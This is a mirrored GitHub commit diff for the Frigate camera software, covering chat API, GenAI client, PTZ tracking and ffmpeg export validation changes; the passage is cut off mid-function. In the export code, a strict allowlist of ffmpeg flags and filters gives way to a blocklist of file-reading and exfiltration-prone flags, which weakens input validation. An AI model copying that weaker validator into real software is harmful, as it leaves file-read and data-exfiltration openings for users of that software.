mirror of
https://github.com/blakeblackshear/frigate.git
synced 2026-07-29 23:29:01 +03:00
Compare commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
0592a8c2c0 |
@@ -125,7 +125,5 @@ jobs:
|
||||
run: devcontainer up --workspace-folder .
|
||||
- name: Run mypy in devcontainer
|
||||
run: devcontainer exec --workspace-folder . bash -lc "python3 -u -m mypy --config-file frigate/mypy.ini frigate"
|
||||
- name: Check API spec is up to date
|
||||
run: devcontainer exec --workspace-folder . bash -lc "python3 generate_api_auth_spec.py --check"
|
||||
- name: Run unit tests in devcontainer
|
||||
run: devcontainer exec --workspace-folder . bash -lc "python3 -u -m unittest"
|
||||
|
||||
@@ -235,14 +235,6 @@ ruff check frigate/
|
||||
|
||||
# Type check
|
||||
python3 -u -m mypy --config-file frigate/mypy.ini frigate
|
||||
|
||||
# Regenerate the OpenAPI spec after adding, changing, or removing an API
|
||||
# endpoint or its auth dependency — outputs docs/static/frigate-api.yaml,
|
||||
# annotated with each endpoint's auth requirement (admin / any / camera /
|
||||
# public). NEVER edit that file by hand. CI runs the --check variant and fails
|
||||
# if it is out of date. (from repo root)
|
||||
python3 generate_api_auth_spec.py
|
||||
python3 generate_api_auth_spec.py --check
|
||||
```
|
||||
|
||||
### Frontend (from web/ directory)
|
||||
@@ -324,8 +316,6 @@ async def get_events(request: Request, limit: int = 100):
|
||||
# Implementation
|
||||
```
|
||||
|
||||
After adding, changing, or removing an endpoint (or its auth dependency), regenerate the OpenAPI spec with `python3 generate_api_auth_spec.py` so `docs/static/frigate-api.yaml` stays in sync and the endpoint's auth requirement is documented. CI enforces this via the `--check` variant; never edit that file by hand.
|
||||
|
||||
### Configuration Access
|
||||
|
||||
```python
|
||||
|
||||
@@ -15,4 +15,4 @@ nvidia-nccl-cu12==2.26.2.post1; platform_machine == 'x86_64'
|
||||
nvidia-nvjitlink-cu12==12.8.93; platform_machine == 'x86_64'
|
||||
onnx==1.16.*; platform_machine == 'x86_64'
|
||||
onnxruntime-gpu==1.24.*; platform_machine == 'x86_64'
|
||||
protobuf==3.20.3; platform_machine == 'x86_64'
|
||||
protobuf==7.35.1; platform_machine == 'x86_64'
|
||||
|
||||
@@ -1,2 +1,2 @@
|
||||
onnx == 1.14.0; platform_machine == 'aarch64'
|
||||
protobuf == 3.20.3; platform_machine == 'aarch64'
|
||||
protobuf == 7.35.1; platform_machine == 'aarch64'
|
||||
|
||||
Vendored
+1463
-2636
File diff suppressed because it is too large
Load Diff
+87
-102
@@ -7,7 +7,7 @@ import operator
|
||||
import time
|
||||
from datetime import datetime
|
||||
from functools import reduce
|
||||
from typing import Any, Optional
|
||||
from typing import Any, Dict, List, Optional
|
||||
|
||||
import cv2
|
||||
from fastapi import APIRouter, Body, Depends, HTTPException, Request
|
||||
@@ -59,7 +59,7 @@ class ToolExecuteRequest(BaseModel):
|
||||
"""Request model for tool execution."""
|
||||
|
||||
tool_name: str
|
||||
arguments: dict[str, Any]
|
||||
arguments: Dict[str, Any]
|
||||
|
||||
|
||||
class VLMMonitorRequest(BaseModel):
|
||||
@@ -68,8 +68,8 @@ class VLMMonitorRequest(BaseModel):
|
||||
camera: str
|
||||
condition: str
|
||||
max_duration_minutes: int = 60
|
||||
labels: list[str] = []
|
||||
zones: list[str] = []
|
||||
labels: List[str] = []
|
||||
zones: List[str] = []
|
||||
|
||||
|
||||
@router.get(
|
||||
@@ -91,10 +91,10 @@ def get_tools(request: Request) -> JSONResponse:
|
||||
|
||||
|
||||
def _resolve_zones(
|
||||
zones: list[str],
|
||||
zones: List[str],
|
||||
config: FrigateConfig,
|
||||
target_cameras: list[str],
|
||||
) -> list[str]:
|
||||
target_cameras: List[str],
|
||||
) -> List[str]:
|
||||
"""Map zone names to their canonical config keys, case-insensitively.
|
||||
|
||||
LLMs frequently echo a user's casing ("Front Yard") instead of the
|
||||
@@ -107,7 +107,7 @@ def _resolve_zones(
|
||||
if not zones:
|
||||
return zones
|
||||
|
||||
lookup: dict[str, str] = {}
|
||||
lookup: Dict[str, str] = {}
|
||||
for camera_id in target_cameras:
|
||||
camera_config = config.cameras.get(camera_id)
|
||||
if camera_config is None:
|
||||
@@ -120,8 +120,8 @@ def _resolve_zones(
|
||||
|
||||
async def _execute_search_objects(
|
||||
request: Request,
|
||||
arguments: dict[str, Any],
|
||||
allowed_cameras: list[str],
|
||||
arguments: Dict[str, Any],
|
||||
allowed_cameras: List[str],
|
||||
) -> JSONResponse:
|
||||
"""
|
||||
Execute the search_objects tool.
|
||||
@@ -213,8 +213,8 @@ async def _execute_search_objects(
|
||||
|
||||
async def _execute_search_objects_semantic(
|
||||
request: Request,
|
||||
arguments: dict[str, Any],
|
||||
allowed_cameras: list[str],
|
||||
arguments: Dict[str, Any],
|
||||
allowed_cameras: List[str],
|
||||
semantic_query: str,
|
||||
) -> JSONResponse:
|
||||
"""Search objects via fused thumbnail + description embeddings.
|
||||
@@ -263,8 +263,8 @@ async def _execute_search_objects_semantic(
|
||||
limit = int(arguments.get("limit", 25))
|
||||
limit = max(1, min(limit, 100))
|
||||
|
||||
visual_distances: dict[str, float] = {}
|
||||
description_distances: dict[str, float] = {}
|
||||
visual_distances: Dict[str, float] = {}
|
||||
description_distances: Dict[str, float] = {}
|
||||
try:
|
||||
rows = context.search_thumbnail(semantic_query)
|
||||
visual_distances = {row[0]: row[1] for row in rows}
|
||||
@@ -305,7 +305,7 @@ async def _execute_search_objects_semantic(
|
||||
|
||||
eligible = {e.id: e for e in Event.select().where(reduce(operator.and_, clauses))}
|
||||
|
||||
scored: list[tuple[str, float]] = []
|
||||
scored: List[tuple[str, float]] = []
|
||||
for eid in eligible:
|
||||
v_score = (
|
||||
distance_to_score(visual_distances[eid], context.thumb_stats)
|
||||
@@ -331,9 +331,9 @@ async def _execute_search_objects_semantic(
|
||||
|
||||
async def _execute_find_similar_objects(
|
||||
request: Request,
|
||||
arguments: dict[str, Any],
|
||||
allowed_cameras: list[str],
|
||||
) -> dict[str, Any]:
|
||||
arguments: Dict[str, Any],
|
||||
allowed_cameras: List[str],
|
||||
) -> Dict[str, Any]:
|
||||
"""Execute the find_similar_objects tool.
|
||||
|
||||
Returns a plain dict (not JSONResponse) so the chat loop can embed it
|
||||
@@ -403,8 +403,8 @@ async def _execute_find_similar_objects(
|
||||
# version (see frigate/embeddings/__init__.py). Mirror the pattern used by
|
||||
# frigate/api/event.py events_search: fetch top-k globally, then intersect
|
||||
# with the structured filters via Peewee.
|
||||
visual_distances: dict[str, float] = {}
|
||||
description_distances: dict[str, float] = {}
|
||||
visual_distances: Dict[str, float] = {}
|
||||
description_distances: Dict[str, float] = {}
|
||||
|
||||
try:
|
||||
if similarity_mode in ("visual", "fused"):
|
||||
@@ -462,7 +462,7 @@ async def _execute_find_similar_objects(
|
||||
eligible = {e.id: e for e in Event.select().where(reduce(operator.and_, clauses))}
|
||||
|
||||
# 6. Fuse and rank.
|
||||
scored: list[tuple[str, float]] = []
|
||||
scored: List[tuple[str, float]] = []
|
||||
for eid in eligible:
|
||||
v_score = (
|
||||
distance_to_score(visual_distances[eid], context.thumb_stats)
|
||||
@@ -503,7 +503,7 @@ async def _execute_find_similar_objects(
|
||||
async def execute_tool(
|
||||
request: Request,
|
||||
body: ToolExecuteRequest = Body(...),
|
||||
allowed_cameras: list[str] = Depends(get_allowed_cameras_for_filter),
|
||||
allowed_cameras: List[str] = Depends(get_allowed_cameras_for_filter),
|
||||
) -> JSONResponse:
|
||||
"""
|
||||
Execute a tool function call.
|
||||
@@ -545,8 +545,8 @@ async def execute_tool(
|
||||
async def _execute_get_live_context(
|
||||
request: Request,
|
||||
camera: str,
|
||||
allowed_cameras: list[str],
|
||||
) -> dict[str, Any]:
|
||||
allowed_cameras: List[str],
|
||||
) -> Dict[str, Any]:
|
||||
# Reject wildcards explicitly so models retry with a real camera name
|
||||
# instead of silently fanning out across every camera.
|
||||
if camera in ("*", "all"):
|
||||
@@ -593,7 +593,7 @@ async def _execute_get_live_context(
|
||||
"stationary": obj_dict.get("stationary", False),
|
||||
}
|
||||
|
||||
result: dict[str, Any] = {
|
||||
result: Dict[str, Any] = {
|
||||
"camera": camera,
|
||||
"timestamp": frame_time,
|
||||
"detections": list(tracked_objects_dict.values()),
|
||||
@@ -620,7 +620,7 @@ async def _execute_get_live_context(
|
||||
async def _get_live_frame_image_url(
|
||||
request: Request,
|
||||
camera: str,
|
||||
allowed_cameras: list[str],
|
||||
allowed_cameras: List[str],
|
||||
) -> Optional[str]:
|
||||
"""
|
||||
Fetch the current live frame for a camera as a base64 data URL.
|
||||
@@ -659,8 +659,8 @@ async def _get_live_frame_image_url(
|
||||
|
||||
async def _execute_set_camera_state(
|
||||
request: Request,
|
||||
arguments: dict[str, Any],
|
||||
) -> dict[str, Any]:
|
||||
arguments: Dict[str, Any],
|
||||
) -> Dict[str, Any]:
|
||||
role = request.headers.get("remote-role", "")
|
||||
if "admin" not in [r.strip() for r in role.split(",")]:
|
||||
return {"error": "Admin privileges required to change camera settings."}
|
||||
@@ -699,10 +699,10 @@ async def _execute_set_camera_state(
|
||||
|
||||
async def _execute_tool_internal(
|
||||
tool_name: str,
|
||||
arguments: dict[str, Any],
|
||||
arguments: Dict[str, Any],
|
||||
request: Request,
|
||||
allowed_cameras: list[str],
|
||||
) -> dict[str, Any]:
|
||||
allowed_cameras: List[str],
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Internal helper to execute a tool and return the result as a dict.
|
||||
|
||||
@@ -763,8 +763,8 @@ async def _execute_tool_internal(
|
||||
|
||||
async def _execute_start_camera_watch(
|
||||
request: Request,
|
||||
arguments: dict[str, Any],
|
||||
) -> dict[str, Any]:
|
||||
arguments: Dict[str, Any],
|
||||
) -> Dict[str, Any]:
|
||||
camera = arguments.get("camera", "").strip()
|
||||
condition = arguments.get("condition", "").strip()
|
||||
max_duration_minutes = int(arguments.get("max_duration_minutes", 60))
|
||||
@@ -814,14 +814,14 @@ async def _execute_start_camera_watch(
|
||||
}
|
||||
|
||||
|
||||
def _execute_stop_camera_watch() -> dict[str, Any]:
|
||||
def _execute_stop_camera_watch() -> Dict[str, Any]:
|
||||
cancelled = stop_vlm_watch_job()
|
||||
if cancelled:
|
||||
return {"success": True, "message": "Watch job cancelled."}
|
||||
return {"success": False, "message": "No active watch job to cancel."}
|
||||
|
||||
|
||||
def _execute_get_profile_status(request: Request) -> dict[str, Any]:
|
||||
def _execute_get_profile_status(request: Request) -> Dict[str, Any]:
|
||||
"""Return profile status including active profile and activation timestamps."""
|
||||
profile_manager = getattr(request.app, "profile_manager", None)
|
||||
if profile_manager is None:
|
||||
@@ -846,9 +846,9 @@ def _execute_get_profile_status(request: Request) -> dict[str, Any]:
|
||||
|
||||
|
||||
def _execute_get_recap(
|
||||
arguments: dict[str, Any],
|
||||
allowed_cameras: list[str],
|
||||
) -> dict[str, Any]:
|
||||
arguments: Dict[str, Any],
|
||||
allowed_cameras: List[str],
|
||||
) -> Dict[str, Any]:
|
||||
"""Fetch review segments with GenAI metadata for a time period."""
|
||||
from functools import reduce
|
||||
|
||||
@@ -909,7 +909,7 @@ def _execute_get_recap(
|
||||
.iterator()
|
||||
)
|
||||
|
||||
events: list[dict[str, Any]] = []
|
||||
events: List[Dict[str, Any]] = []
|
||||
|
||||
for row in rows:
|
||||
data = row.get("data") or {}
|
||||
@@ -920,7 +920,7 @@ def _execute_get_recap(
|
||||
data = {}
|
||||
|
||||
camera = row["camera"]
|
||||
event: dict[str, Any] = {
|
||||
event: Dict[str, Any] = {
|
||||
"camera": camera.replace("_", " ").title(),
|
||||
"severity": row.get("severity", "detection"),
|
||||
}
|
||||
@@ -984,10 +984,10 @@ def _execute_get_recap(
|
||||
|
||||
|
||||
async def _execute_pending_tools(
|
||||
pending_tool_calls: list[dict[str, Any]],
|
||||
pending_tool_calls: List[Dict[str, Any]],
|
||||
request: Request,
|
||||
allowed_cameras: list[str],
|
||||
) -> tuple[list[ToolCall], list[dict[str, Any]], list[dict[str, Any]]]:
|
||||
allowed_cameras: List[str],
|
||||
) -> tuple[List[ToolCall], List[Dict[str, Any]], List[Dict[str, Any]]]:
|
||||
"""
|
||||
Execute a list of tool calls.
|
||||
|
||||
@@ -996,9 +996,9 @@ async def _execute_pending_tools(
|
||||
tool result dicts for conversation,
|
||||
extra messages to inject after tool results — e.g. user messages with images)
|
||||
"""
|
||||
tool_calls_out: list[ToolCall] = []
|
||||
tool_results: list[dict[str, Any]] = []
|
||||
extra_messages: list[dict[str, Any]] = []
|
||||
tool_calls_out: List[ToolCall] = []
|
||||
tool_results: List[Dict[str, Any]] = []
|
||||
extra_messages: List[Dict[str, Any]] = []
|
||||
for tool_call in pending_tool_calls:
|
||||
tool_name = tool_call["name"]
|
||||
tool_args = tool_call.get("arguments") or {}
|
||||
@@ -1106,7 +1106,7 @@ async def _execute_pending_tools(
|
||||
async def chat_completion(
|
||||
request: Request,
|
||||
body: ChatCompletionRequest = Body(...),
|
||||
allowed_cameras: list[str] = Depends(get_allowed_cameras_for_filter),
|
||||
allowed_cameras: List[str] = Depends(get_allowed_cameras_for_filter),
|
||||
):
|
||||
"""
|
||||
Chat completion endpoint with tool calling support.
|
||||
@@ -1138,23 +1138,19 @@ async def chat_completion(
|
||||
)
|
||||
conversation = []
|
||||
|
||||
# Build the system message only when the client hasn't already pinned one.
|
||||
# The first turn has no system message; we generate it (with the current
|
||||
# timestamp) and return the whole chain so the client persists it. Later
|
||||
# turns send it back verbatim, freezing the timestamp so the prompt prefix
|
||||
# stays byte-identical and the model server's prompt cache keeps hitting.
|
||||
if not body.messages or body.messages[0].role != "system":
|
||||
conversation.append(
|
||||
{
|
||||
"role": "system",
|
||||
"content": build_chat_system_prompt(
|
||||
config=config,
|
||||
allowed_cameras=allowed_cameras,
|
||||
semantic_search_enabled=semantic_search_enabled,
|
||||
attribute_classifications=attribute_classifications,
|
||||
),
|
||||
}
|
||||
)
|
||||
system_prompt = build_chat_system_prompt(
|
||||
config=config,
|
||||
allowed_cameras=allowed_cameras,
|
||||
semantic_search_enabled=semantic_search_enabled,
|
||||
attribute_classifications=attribute_classifications,
|
||||
)
|
||||
|
||||
conversation.append(
|
||||
{
|
||||
"role": "system",
|
||||
"content": system_prompt,
|
||||
}
|
||||
)
|
||||
|
||||
for msg in body.messages:
|
||||
msg_dict = {
|
||||
@@ -1165,13 +1161,11 @@ async def chat_completion(
|
||||
msg_dict["tool_call_id"] = msg.tool_call_id
|
||||
if msg.name:
|
||||
msg_dict["name"] = msg.name
|
||||
if msg.tool_calls is not None:
|
||||
msg_dict["tool_calls"] = msg.tool_calls
|
||||
|
||||
conversation.append(msg_dict)
|
||||
|
||||
tool_iterations = 0
|
||||
tool_calls: list[ToolCall] = []
|
||||
tool_calls: List[ToolCall] = []
|
||||
max_iterations = body.max_tool_iterations
|
||||
|
||||
logger.debug(
|
||||
@@ -1181,20 +1175,11 @@ async def chat_completion(
|
||||
|
||||
# True LLM streaming when client supports it and stream requested
|
||||
if body.stream and hasattr(genai_client, "chat_with_tools_stream"):
|
||||
stream_tool_calls: List[ToolCall] = []
|
||||
stream_iterations = 0
|
||||
|
||||
async def stream_body_llm():
|
||||
nonlocal conversation, stream_iterations
|
||||
|
||||
def _emit_chain(extra: Optional[list[dict[str, Any]]] = None):
|
||||
# Return the full conversation (including the system message) so
|
||||
# the client persists and replays it verbatim next turn.
|
||||
chain = conversation + (extra or [])
|
||||
return (
|
||||
json.dumps({"type": "messages", "messages": chain}).encode("utf-8")
|
||||
+ b"\n"
|
||||
)
|
||||
|
||||
nonlocal conversation, stream_tool_calls, stream_iterations
|
||||
while stream_iterations < max_iterations:
|
||||
if await request.is_disconnected():
|
||||
logger.debug("Client disconnected, stopping chat stream")
|
||||
@@ -1259,33 +1244,31 @@ async def chat_completion(
|
||||
)
|
||||
return
|
||||
(
|
||||
_executed_calls,
|
||||
executed_calls,
|
||||
tool_results,
|
||||
extra_msgs,
|
||||
) = await _execute_pending_tools(
|
||||
pending, request, allowed_cameras
|
||||
)
|
||||
stream_tool_calls.extend(executed_calls)
|
||||
conversation.extend(tool_results)
|
||||
conversation.extend(extra_msgs)
|
||||
# Emit the running chain so the client can render tool
|
||||
# calls live and replay them verbatim next turn.
|
||||
yield _emit_chain()
|
||||
yield (
|
||||
json.dumps(
|
||||
{
|
||||
"type": "tool_calls",
|
||||
"tool_calls": [
|
||||
tc.model_dump() for tc in stream_tool_calls
|
||||
],
|
||||
}
|
||||
).encode("utf-8")
|
||||
+ b"\n"
|
||||
)
|
||||
break
|
||||
else:
|
||||
# Streaming never appends the final assistant message
|
||||
# to the conversation, so add it to the chain.
|
||||
yield _emit_chain(
|
||||
extra=[
|
||||
{
|
||||
"role": "assistant",
|
||||
"content": msg.get("content"),
|
||||
}
|
||||
]
|
||||
)
|
||||
yield (json.dumps({"type": "done"}).encode("utf-8") + b"\n")
|
||||
return
|
||||
else:
|
||||
yield _emit_chain()
|
||||
yield json.dumps({"type": "done"}).encode("utf-8") + b"\n"
|
||||
|
||||
return StreamingResponse(
|
||||
@@ -1332,15 +1315,19 @@ async def chat_completion(
|
||||
if body.stream:
|
||||
final_reasoning = response.get("reasoning")
|
||||
|
||||
chain = list(conversation)
|
||||
|
||||
async def stream_body() -> Any:
|
||||
yield (
|
||||
json.dumps({"type": "messages", "messages": chain}).encode(
|
||||
"utf-8"
|
||||
if tool_calls:
|
||||
yield (
|
||||
json.dumps(
|
||||
{
|
||||
"type": "tool_calls",
|
||||
"tool_calls": [
|
||||
tc.model_dump() for tc in tool_calls
|
||||
],
|
||||
}
|
||||
).encode("utf-8")
|
||||
+ b"\n"
|
||||
)
|
||||
+ b"\n"
|
||||
)
|
||||
# Emit the full reasoning trace up front when the
|
||||
# underlying client did not stream it
|
||||
if final_reasoning:
|
||||
@@ -1376,7 +1363,6 @@ async def chat_completion(
|
||||
finish_reason=response.get("finish_reason", "stop"),
|
||||
tool_iterations=tool_iterations,
|
||||
tool_calls=tool_calls,
|
||||
messages=list(conversation),
|
||||
).model_dump(),
|
||||
)
|
||||
|
||||
@@ -1409,7 +1395,6 @@ async def chat_completion(
|
||||
finish_reason="length",
|
||||
tool_iterations=tool_iterations,
|
||||
tool_calls=tool_calls,
|
||||
messages=list(conversation),
|
||||
).model_dump(),
|
||||
)
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
"""Chat API request models."""
|
||||
|
||||
from typing import Any, Optional
|
||||
from typing import Optional
|
||||
|
||||
from pydantic import BaseModel, Field
|
||||
|
||||
@@ -11,29 +11,13 @@ class ChatMessage(BaseModel):
|
||||
role: str = Field(
|
||||
description="Message role: 'user', 'assistant', 'system', or 'tool'"
|
||||
)
|
||||
content: Optional[Any] = Field(
|
||||
default=None,
|
||||
description=(
|
||||
"Message content. Usually a string, but may be a multimodal content "
|
||||
"list (e.g. text + image_url) or null for assistant turns that only "
|
||||
"request tool calls."
|
||||
),
|
||||
)
|
||||
content: str = Field(description="Message content")
|
||||
tool_call_id: Optional[str] = Field(
|
||||
default=None, description="For tool messages, the ID of the tool call"
|
||||
)
|
||||
name: Optional[str] = Field(
|
||||
default=None, description="For tool messages, the tool name"
|
||||
)
|
||||
tool_calls: Optional[list[dict[str, Any]]] = Field(
|
||||
default=None,
|
||||
description=(
|
||||
"For assistant messages replayed from prior turns, the OpenAI-format "
|
||||
"tool calls the model previously requested. Replaying these verbatim "
|
||||
"keeps the conversation prefix byte-for-byte identical so the model "
|
||||
"server's prompt cache hits on follow-up turns."
|
||||
),
|
||||
)
|
||||
|
||||
|
||||
class ChatCompletionRequest(BaseModel):
|
||||
|
||||
@@ -56,12 +56,3 @@ class ChatCompletionResponse(BaseModel):
|
||||
default_factory=list,
|
||||
description="List of tool calls that were executed during this completion",
|
||||
)
|
||||
messages: list[dict[str, Any]] = Field(
|
||||
default_factory=list,
|
||||
description=(
|
||||
"The full conversation chain, including the system message. Persist "
|
||||
"and replay this verbatim on the next request so the prompt prefix "
|
||||
"stays byte-identical and the model server's prompt cache keeps "
|
||||
"hitting."
|
||||
),
|
||||
)
|
||||
|
||||
@@ -5,7 +5,6 @@ import json
|
||||
import logging
|
||||
import os
|
||||
import re
|
||||
import time
|
||||
from typing import Any, AsyncGenerator, Callable, Optional
|
||||
|
||||
import numpy as np
|
||||
@@ -51,10 +50,6 @@ def register_genai_provider(key: GenAIProviderEnum) -> Callable:
|
||||
class GenAIClient:
|
||||
"""Generative AI client for Frigate."""
|
||||
|
||||
# Minimum seconds between re-initialization attempts when the provider was
|
||||
# offline at startup
|
||||
REINIT_INTERVAL = 60.0
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
genai_config: GenAIConfig,
|
||||
@@ -65,34 +60,6 @@ class GenAIClient:
|
||||
self.timeout = timeout
|
||||
self.validate_model = validate_model
|
||||
self.provider = self._init_provider()
|
||||
self._last_init_attempt = time.monotonic()
|
||||
|
||||
def ensure_provider(self) -> bool:
|
||||
"""Ensure a provider is available, retrying initialization if needed.
|
||||
|
||||
Providers can fail to initialize at startup when their backing service
|
||||
isn't online yet (common when both are started together). This retries
|
||||
``_init_provider`` lazily — throttled to ``REINIT_INTERVAL`` — so the
|
||||
client recovers on its own once the service is reachable, without a
|
||||
config reload.
|
||||
|
||||
Returns True if a provider is available.
|
||||
"""
|
||||
if self.provider is not None:
|
||||
return True
|
||||
|
||||
now = time.monotonic()
|
||||
if now - self._last_init_attempt < self.REINIT_INTERVAL:
|
||||
return False
|
||||
|
||||
self._last_init_attempt = now
|
||||
self.provider = self._init_provider()
|
||||
if self.provider is not None:
|
||||
logger.info(
|
||||
"GenAI provider %s is now available",
|
||||
self.genai_config.provider,
|
||||
)
|
||||
return self.provider is not None
|
||||
|
||||
def generate_review_description(
|
||||
self,
|
||||
|
||||
@@ -62,9 +62,7 @@ class GenAIClientManager:
|
||||
def _get_client(self, name: str) -> "Optional[GenAIClient]":
|
||||
"""Return the client for *name*, creating it on first access."""
|
||||
if name in self._clients:
|
||||
client = self._clients[name]
|
||||
client.ensure_provider()
|
||||
return client
|
||||
return self._clients[name]
|
||||
|
||||
from frigate.genai import PROVIDERS
|
||||
|
||||
@@ -80,7 +78,7 @@ class GenAIClientManager:
|
||||
return None
|
||||
|
||||
try:
|
||||
client = provider_cls(genai_cfg)
|
||||
client: "GenAIClient" = provider_cls(genai_cfg)
|
||||
except Exception as e:
|
||||
logger.exception(
|
||||
"Failed to create GenAI client for provider %s: %s",
|
||||
|
||||
@@ -48,22 +48,6 @@ def ptz_moving_at_frame_time(frame_time, ptz_start_time, ptz_stop_time):
|
||||
)
|
||||
|
||||
|
||||
def transform_is_finite(coord_transformations) -> bool:
|
||||
"""Return True if a norfair coordinate transform contains only finite values.
|
||||
|
||||
A near-singular homography (common when the motion estimator can't find
|
||||
enough stable features during zoom on a low-texture scene) can produce
|
||||
inf/nan matrix entries. norfair accumulates the homography across frames, so
|
||||
a single bad transform poisons every subsequent one and propagates nan into
|
||||
the tracker's distance function, crashing the camera process.
|
||||
"""
|
||||
for attr in ("homography_matrix", "inverse_homography_matrix", "movement_vector"):
|
||||
value = getattr(coord_transformations, attr, None)
|
||||
if value is not None and not np.all(np.isfinite(value)):
|
||||
return False
|
||||
return True
|
||||
|
||||
|
||||
class PtzMotionEstimator:
|
||||
def __init__(self, config: CameraConfig, ptz_metrics: PTZMetrics) -> None:
|
||||
self.frame_manager = SharedMemoryFrameManager()
|
||||
@@ -151,19 +135,6 @@ class PtzMotionEstimator:
|
||||
)
|
||||
self.coord_transformations = None
|
||||
|
||||
# A degenerate homography can yield non-finite transform values that
|
||||
# norfair would accumulate and feed to the tracker as nan estimates.
|
||||
# Drop the bad transform and request a reset so the estimator rebuilds
|
||||
# a fresh reference frame instead of poisoning every following frame.
|
||||
if self.coord_transformations is not None and not transform_is_finite(
|
||||
self.coord_transformations
|
||||
):
|
||||
logger.warning(
|
||||
f"Autotracker: motion estimator produced a non-finite transform for {camera} at frame time {frame_time}, resetting"
|
||||
)
|
||||
self.coord_transformations = None
|
||||
self.ptz_metrics.reset.set()
|
||||
|
||||
try:
|
||||
logger.debug(
|
||||
f"{camera}: Motion estimator transformation: {self.coord_transformations.rel_to_abs([[0, 0]])}"
|
||||
|
||||
+37
-132
@@ -42,118 +42,33 @@ TIMELAPSE_DATA_INPUT_ARGS = "-an -skip_frame nokey"
|
||||
# Captures the floating-point factor so we can scale expected duration.
|
||||
SETPTS_FACTOR_RE = re.compile(r"setpts=([0-9]*\.?[0-9]+)\*PTS")
|
||||
|
||||
# Allowlisted flags that take no value.
|
||||
_VALUELESS_FLAGS = frozenset({"-an", "-sn", "-dn"})
|
||||
|
||||
# Allowlisted filter flags. Their value is validated as a filtergraph and may
|
||||
# only reference filters in _SAFE_FILTERS.
|
||||
_FILTER_FLAGS = frozenset({"-vf", "-af", "-filter"})
|
||||
|
||||
# Allowlisted flags that take exactly one value (encoder / muxer-safe options).
|
||||
_VALUE_FLAGS = frozenset(
|
||||
# ffmpeg flags that can read from or write to arbitrary files
|
||||
BLOCKED_FFMPEG_ARGS = frozenset(
|
||||
{
|
||||
"-c",
|
||||
"-codec",
|
||||
"-b",
|
||||
"-crf",
|
||||
"-qp",
|
||||
"-q",
|
||||
"-qscale",
|
||||
"-preset",
|
||||
"-tune",
|
||||
"-profile",
|
||||
"-level",
|
||||
"-pix_fmt",
|
||||
"-r",
|
||||
"-g",
|
||||
"-keyint_min",
|
||||
"-sc_threshold",
|
||||
"-bf",
|
||||
"-refs",
|
||||
"-qmin",
|
||||
"-qmax",
|
||||
"-maxrate",
|
||||
"-minrate",
|
||||
"-bufsize",
|
||||
"-movflags",
|
||||
"-threads",
|
||||
"-aspect",
|
||||
"-fps_mode",
|
||||
"-vsync",
|
||||
"-skip_frame",
|
||||
"-i",
|
||||
"-filter_script",
|
||||
"-filter_complex",
|
||||
"-lavfi",
|
||||
"-vf",
|
||||
"-af",
|
||||
"-filter",
|
||||
"-vstats_file",
|
||||
"-passlogfile",
|
||||
"-sdp_file",
|
||||
"-dump_attachment",
|
||||
"-attach",
|
||||
}
|
||||
)
|
||||
|
||||
_ALLOWED_FLAGS = _VALUELESS_FLAGS | _FILTER_FLAGS | _VALUE_FLAGS
|
||||
|
||||
# Filters that cannot read files, load plugins, or open network sources.
|
||||
_SAFE_FILTERS = frozenset(
|
||||
{
|
||||
"setpts",
|
||||
"fps",
|
||||
"scale",
|
||||
"format",
|
||||
"transpose",
|
||||
"hflip",
|
||||
"vflip",
|
||||
"crop",
|
||||
"pad",
|
||||
"setsar",
|
||||
"setdar",
|
||||
}
|
||||
)
|
||||
|
||||
# Conservative shape for a non-filter flag value. Excludes "/" (paths /
|
||||
# filtergraph division), whitespace, brackets, and a leading "-" so a value
|
||||
# can never be a path or swallow a following flag. ":" is permitted for values
|
||||
# like "16:9".
|
||||
_SAFE_VALUE_RE = re.compile(r"^[A-Za-z0-9_.:+][A-Za-z0-9_.:+-]*$")
|
||||
|
||||
# Substrings inside a filtergraph that indicate a file-reading filter option.
|
||||
# "movie=" also matches "amovie=" as a substring.
|
||||
_BLOCKED_FILTER_VALUE_MARKERS = ("movie=", "textfile=", "filename=", "fontfile=")
|
||||
|
||||
|
||||
def _base_flag(token: str) -> str:
|
||||
"""Return a flag's base name, lowercased and without its stream specifier.
|
||||
|
||||
e.g. "-c:v" -> "-c", "-filter:a:0" -> "-filter".
|
||||
"""
|
||||
return token.lower().split(":", 1)[0]
|
||||
|
||||
|
||||
def _validate_filtergraph(value: str) -> tuple[bool, str]:
|
||||
"""Validate a filtergraph value, allowing only filters in _SAFE_FILTERS."""
|
||||
# None of the safe filters need any of these
|
||||
if any(token in value for token in ("://", "..", "[", "]")):
|
||||
return False, "Invalid filter graph in custom ffmpeg arguments"
|
||||
|
||||
lowered = value.lower()
|
||||
if any(marker in lowered for marker in _BLOCKED_FILTER_VALUE_MARKERS):
|
||||
return False, "File-reading filters are not allowed in custom ffmpeg arguments"
|
||||
|
||||
# Filters are separated by "," within a chain and ";" between chains. Safe
|
||||
# filters never use unescaped "," or ";" in their arguments, so splitting on
|
||||
# them to recover filter names cannot hide a disallowed filter.
|
||||
for spec in re.split(r"[;,]", value):
|
||||
spec = spec.strip()
|
||||
if not spec:
|
||||
continue
|
||||
|
||||
name = spec.split("=", 1)[0].strip().lower()
|
||||
if name not in _SAFE_FILTERS:
|
||||
return False, f"Filter not allowed in custom ffmpeg arguments: {name}"
|
||||
|
||||
return True, ""
|
||||
|
||||
|
||||
def validate_ffmpeg_args(args: str) -> tuple[bool, str]:
|
||||
"""Validate user-provided custom export ffmpeg args with an allowlist.
|
||||
"""Validate that user-provided ffmpeg args don't allow input/output injection.
|
||||
|
||||
Every token must be an allowlisted flag or the value of one; filter values
|
||||
may only reference safe filters; and no token may become a bare input or
|
||||
output URL. This structurally prevents arbitrary file read/write, network
|
||||
exfiltration/SSRF, and resource-exhaustion via the export endpoint.
|
||||
Blocks:
|
||||
- The -i flag and other flags that read/write arbitrary files
|
||||
- Filter flags (can read files via movie=/amovie= source filters)
|
||||
- Absolute/relative file paths (potential extra outputs)
|
||||
- URLs and ffmpeg protocol references (data exfiltration)
|
||||
|
||||
Admin users skip this validation entirely since they are trusted.
|
||||
"""
|
||||
@@ -161,36 +76,26 @@ def validate_ffmpeg_args(args: str) -> tuple[bool, str]:
|
||||
return True, ""
|
||||
|
||||
tokens = args.split()
|
||||
i = 0
|
||||
while i < len(tokens):
|
||||
token = tokens[i]
|
||||
|
||||
# A bare (non-flag) token here would be parsed by ffmpeg as an input or
|
||||
# output URL. Only the server sets inputs/outputs, never the user.
|
||||
if not token.startswith("-"):
|
||||
